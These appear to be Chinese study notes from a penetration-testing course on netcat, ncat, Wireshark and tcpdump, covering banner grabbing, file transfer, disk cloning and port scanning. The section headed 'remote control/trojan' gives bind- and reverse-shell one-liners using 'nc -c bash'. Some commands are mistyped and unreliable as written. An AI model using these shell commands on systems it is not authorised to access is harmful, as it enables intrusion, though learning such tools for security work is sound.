teurcrypt 加密信息

通过hash值查看文件是否被修改

truecrypt 加密工具

基本工具

NetCat

网络工具中的瑞士军刀–小身材、大智慧

telnet/banner信息

telnet:(远程登录) 
banner信息:(横幅广告，用于表明端口的身份，显示欢迎信息)

ex： 
nc -nv ip 端口 
侦听目标端口 
nc -nv 1.1.1.1 110 
nc -nv 1.1.1.1 80

传输文本信息

A:nc -l -p 4444 -l 表示侦听端口命令，-p 指定要侦听的端口（服务端） 
B:nc -nv 1.1.1.1 4444

可用于远程电子取证信息收集

传输文件/目录

• 传输文件： 
  • A：nc -lp 333 > 1.mp4侦听333端口，将侦听到的内容输出到1.mp4 >表示输出
  • B：nc -nv 1.1.1.1 333 <1.mp4 -q 1 连接目标端口，将要传输的内容输入，传递完后1s连接自动断开 <表示输入，-q表示完成前一个命令后自动断开连接
  • 或
  • A：nc -lp 333 <a.mp4 -q 1
  • B：nc -nv 1.1.1.1 333 >2.mp4
• 传输目录： 
  • A：tar -cvf - music/ | nc -lp 333 -q 1将目录打包成一个文件，再传输
  • B： nc -nv 1.1.1.1 333 | tar -xvf –接收文件，解包

加密传输文件:

• A：nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb >1.mp4
• B：mcrypt –flush -Fbq -a rijndael-256 -m ecb<a.mp4 | nc -nv 1.1.1.1 333 -q l

远程控制/木马

• 正向： 
  • A：nc -lp 333 -c bash
  • B：nc 1.1.1. 333
• 反向： 
  • A：nc -lp 333
  • B：1.1.1.1 333 -c bash
• 注：windows用户把bash改成cmd

流媒体服务器

• A：cat 1.mp4 | nc -lp 333
• B：1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

远程克隆硬盘

A：nc -lp 333 | dd of=/dev/sda 
B：DD if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

端口扫描

• nc -nvz 1.1.1.1 1-65535-z扫描模式(默认只扫描tcp的端口)
• nc -vnzu 1.1.1.1 1-1024-u（扫描udp的端口）

nc的缺陷

• 缺乏加密和身份验证的能力
• Ncat包含于nmap工具包中
• A: ncat -c bash –allow 192.168.20.14 -vnl 333 –ssl
• B：ncat -nv 1.1.1.1 333 –ssl
• nc在不同系统/平台的版本可能不同，参数有变化

Wireshark

简介： 
主要功能：抓包嗅探协议分析 
抓包引擎： 
Libpcap9——Linux 
Winpcap10——Windows

基本使用

启动 
启动时会有一个权限方面的报错，不用管它，处理这个错误没有什么意义 
选择抓包网卡 
个人电脑通常会有一个以太网网卡和无线网网卡，服务器可能有多个网卡 
混杂模式 
会抓取所有经过网卡的数据包 
实时抓包 
保存和分析捕获文件

筛选器

过滤掉干扰数据包 
抓包筛选器 
显示筛选器

常见协议包

数据包的分层结构 
Arp,lcmp,UDP,dns, 
http/https 
ftp 
TCP(三次握手) 
数据流

信息统计

节点数 
协议分布 
包大小分布 
会话连接 
解码方式 
专家系统

实践

抓包对比nc、ncat加密与不加密的流量

企业抓包部署方案(全流量抓包)

• Sniffer
• Cace/riverbed

Tcpdump

No-GUI的抓包分析工具 
Linux、Unix系统默认安装

抓包

默认只抓68个字节 
tcpdump -i eth0 -s 0 -w file.pcap 
Tcpdump -i eth0 part 22

筛选，高级筛选

过程文档记录

• Dradis 
  • 短期临时小团队资源共享
  • 各种插件导入文件
• Keepnote
• Truecrypt(加密的工具)